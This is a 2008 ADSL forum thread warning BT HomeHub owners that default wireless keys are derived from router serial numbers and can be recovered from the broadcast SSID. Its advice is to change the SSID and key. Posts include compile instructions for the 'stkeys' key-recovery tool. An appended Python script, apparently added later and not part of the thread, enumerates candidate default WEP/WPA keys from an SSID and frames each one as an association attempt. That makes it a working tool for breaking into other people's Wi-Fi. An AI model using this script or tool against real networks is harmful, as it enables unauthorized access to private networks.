Kitz ADSL Broadband Information
Topic: Attention BT HomeHub Users

rizla
« on: April 15, 2008, 04:01:48 PM »

The BT HomeHub, in common with many ISP-supplied routers, comes with the wireless security preconfigured. By that I mean there is an SSID and a WEP/WPA Key preconfigured in the router before it is shipped. There will usually be a sticker on the router with something like this on it:

Default SSID = BTHomeHub-8DF3
Default WEP/WPA Key = 06f48a28eb

Now neither the SSID nor the Key is chosen randomly or sequentially, so the next router in the sequence wouldn't necessarily be BTHomeHub-8DF4, but it could be. Basically the ISPs use some sort of predictable algorithm to generate the Key and the SSID, both of which should hopefully be unique.

The only sensible way to generate the key is really from the router's serial number and that's what they generally do.

Now here's the bombshell.

The way that BT implemented this has a glaring vulnerability.

This means that you can take a default SSID like BTHomeHub-8DF3 and derive a list of possible keys from the SSID and knowledge of the serial number structure (e.g. CP0647EH6DM(BF)). In the case of the BTHomeHub there would be 80 possible keys, which would take very little time to try.

This is so important it is worth shouting:

IF YOU USE THE DEFAULT SSID/KEY IT MAKES NO DIFFERENCE WHETHER YOU USE WEP OR WPA! YOU ARE VULNERABLE

This isn't unique to BT - Orange in Spain use ST585v6 routers preconfigured to use WPA. A tool exists which will narrow the choice of keys down to two!

What should you do?

Simply change the SSID and WEP/WPA key to something else.

If you are using WEP then try using WPA instead as WEP is not secure.

More reading - http://www.gnucitizen.org/blog/default-key-algorithm-in-thomson-and-bt-home-hub-routers/
« Last Edit: April 15, 2008, 04:04:23 PM by rizla »

soms
« Reply #1 on: April 16, 2008, 01:18:48 PM »

Very interesting reading. Thanks for the heads up Rizla.

I downloaded the stkeys archive but it seems to contain program source code in the C language. Without going off topic, do you know anything about how I could compile the program to use it? I have downloaded NetBeans IDE C/C++ but am having trouble understanding it and also adding in a compiler, which oddly is not included.
Floydoid
« Reply #2 on: April 16, 2008, 01:23:10 PM »

Soms, is this page of any use?

http://www.thefreecountry.com/compilers/cpp.shtml
soms
« Reply #3 on: April 16, 2008, 01:39:51 PM »

Cheers Floydoid, looks hopeful. Will see what I can find.
Floydoid
« Reply #4 on: April 16, 2008, 01:42:43 PM »

It looks like a site dedicated to C programming... but don't ask me, I did a level 2 NVQ in C+ back in '95 and don't remember much at all.

(I believe we were using good old 286 machines at the time.)
rizla
« Reply #5 on: April 16, 2008, 04:05:57 PM »

In the stkeys.c file it actually tells you how to do this.

You'll need GCC for whatever platform you have - http://gcc.gnu.org/

Then compile the source:

gcc -fomit-frame-pointer -O3 -funroll-all-loops stkeys.c sha1.c -ostkeys

Then run it according to the instructions in stkeys.c
rizla
« Reply #6 on: April 24, 2008, 10:01:29 AM »

TBB have now picked up on this - better late than never, eh?
kitz
« Reply #7 on: April 24, 2008, 10:32:39 AM »

Whoops, I said the other day I was going to sticky a copy in the Hardware section - sorry, forgot.
rizla
« Reply #8 on: April 24, 2008, 10:44:58 AM »

Did you? I forgot too in that case.
Azzaka (ISP Rep)
« Reply #9 on: April 24, 2008, 11:15:26 AM »

The new v7's do not have this vulnerability, however I don't know if the BT Home Hub will be upgraded to incorporate the new version.
kitz
« Reply #10 on: April 24, 2008, 11:34:13 AM »

>> Did you? I forgot too in that case

Yep - just before we also talked about BT's new boss's challenge to OFCOM (which I also forgot to post till today).
rizla
« Reply #11 on: April 24, 2008, 03:39:47 PM »

>> The new v7's do not have this vulnerability, however I don't know if the BT Home Hub will be upgraded to incorporate the new version.

Just to make this clear to everyone: this isn't some sort of security problem inherent to a brand/version of router; this is a security problem with the way that the key and SSID have been generated. I rather suspect we'll find that the "Secure Easy Setup" button on Linksys kit operates in a similar way.

On reflection, using a key generated from something as easily predictable as a serial number is stunningly dumb. It is hard to believe that vulnerabilities such as these haven't already been widely exploited, as it's so trivially easy to do.
J.Man
« Reply #12 on: April 28, 2008, 08:39:02 PM »

Hey Rizla, I'm sorry, it isn't too easy to change the password, as if you do your HomeHub will revert back to the default pass and therefore drag you back into the issue you pointed out. All I can honestly say is that if you do try to change the password, don't make it obvious. Say you support Arsenal and your birthday is the 12th of August, for instance: making your password something to do with those two could be pretty dimwitted. Another piece of advice is to either downgrade to firmware 6.1.1.2 E, I think it is, or upgrade to 6.2.2.6 C.
rizla
« Reply #13 on: April 30, 2008, 09:19:08 AM »

That sounds a bit odd. I changed the SSID and key on our neighbour's connection and that went OK.

The key isn't really the major problem; it's the fact that the broadcast SSID and serial numbers can be used to yield that key with little difficulty.

Changing the SSID will minimise the risk but it won't eliminate it as you could still generate all possible keys for the router just from knowledge of the serial number structure. While there will be a LOT of keys to test it does mean that no encryption algorithm is safe if the printed key is used.
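Added example, not code from this thread, from stkeys or from BT: a Python sketch of the SSID-to-key enumeration described in the first post, and of why (as Reply #13 says) changing the SSID but keeping the printed key only lengthens the candidate list. It assumes the scheme as published for the SpeedTouch/BT Home Hub default keys in the gnucitizen write-up linked above: serial layout CPYYWWPPXXX(CC) with YY = year, WW = week, PP = production code and XXX = three characters from 0-9A-Z; SHA-1 over "CP" + YY + WW + the hex-ASCII of XXX; the first 5 digest bytes as the 10-hex-character key; the last 2 bytes as the 4-character BTHomeHub SSID suffix. Those byte positions and the alphabet are assumptions here, not something the thread states. The serial CP0647EH6DM from the first post is used only as constructed input; nothing below claims it is the serial behind BTHomeHub-8DF3 / 06f48a28eb.

```python
"""Enumerate candidate default keys for a BT Home Hub style SSID.

Added example for the Kitz thread; not code from the thread, from stkeys or
from BT.  The serial layout, the hashed fields and the digest byte positions
are assumptions taken from the published description of the SpeedTouch /
BT Home Hub default-key scheme (see the lead-in).
"""
from __future__ import annotations

import hashlib
import itertools
import string

SSID_PREFIX = "BTHomeHub-"
UNIT_CHARS = string.digits + string.ascii_uppercase   # assumed XXX alphabet: 36^3 units


def hash_input(year: str, week: str, unit: str) -> bytes:
    """The bytes that get hashed: "CP" + YY + WW + hex-ASCII of the unit field.

    The two-character production code (the "EH" in CP0647EH6DM) is assumed
    not to take part, which is what keeps the search space small.
    """
    unit_hex = unit.encode("ascii").hex().upper()      # "6DM" -> "36444D"
    return f"CP{year}{week}{unit_hex}".encode("ascii")


def sticker_for_serial(serial: str) -> tuple[str, str]:
    """Derive the (SSID, key) pair printed on the sticker from a full serial.

    Assumed positions: key = first 5 digest bytes (10 hex chars, lower case
    as on the sticker quoted in the thread), SSID suffix = last 2 bytes.
    A trailing "(CC)" checksum, as in CP0647EH6DM(BF), is ignored.
    """
    serial = serial.upper()
    if not (serial.startswith("CP") and len(serial) >= 11):
        raise ValueError("expected a serial of the form CPYYWWPPXXX")
    year, week, unit = serial[2:4], serial[4:6], serial[8:11]
    digest = hashlib.sha1(hash_input(year, week, unit)).digest()
    return SSID_PREFIX + digest[-2:].hex().upper(), digest[:5].hex()


def candidate_keys(ssid: str, years, weeks) -> list[tuple[str, str]]:
    """Keys consistent with a broadcast SSID over a guessed production range.

    Returns (partial serial, key) pairs; the production code is unknown and
    shown as "??".  Each key in the list costs one WPA/WEP association attempt.
    Without the SSID (owner changed it, kept the printed key) the same loop
    minus the suffix test yields 36^3 keys per production week instead.
    """
    if not ssid.startswith(SSID_PREFIX):
        raise ValueError("expected an SSID of the form BTHomeHub-XXXX")
    suffix = bytes.fromhex(ssid[len(SSID_PREFIX):])
    if len(suffix) != 2:
        raise ValueError("expected a 4-hex-digit SSID suffix")
    hits = []
    for year, week in itertools.product(years, weeks):
        for chars in itertools.product(UNIT_CHARS, repeat=3):
            unit = "".join(chars)
            digest = hashlib.sha1(hash_input(year, week, unit)).digest()
            if digest[-2:] == suffix:
                hits.append((f"CP{year}{week}??{unit}", digest[:5].hex()))
    return hits


if __name__ == "__main__":
    # Constructed input: the serial quoted in the first post, used only as an example.
    ssid, key = sticker_for_serial("CP0647EH6DM")
    print("sticker:", ssid, key)
    weeks = [f"{w:02d}" for w in range(45, 50)]        # guess: late 2006 production
    hits = candidate_keys(ssid, ["06"], weeks)
    print(f"{len(hits)} candidate key(s) for {ssid} over 2006 weeks 45-49:")
    for partial, k in hits:
        print(f"  {partial}  {k}{'  <- matches the sticker' if k == key else ''}")
```

With a 16-bit SSID suffix tested against 36^3 = 46656 units per production week, the loop produces on average under one spurious hit per week, so a plausible range of weeks gives a list of the size the first post describes; dropping the suffix test (the changed-SSID, printed-key case) leaves 46656 keys per week, which is still a finite list to try offline. One practical caveat: a WPA passphrase is case-sensitive while a WEP hex key is not, so candidates should be tried in the case actually printed on the sticker.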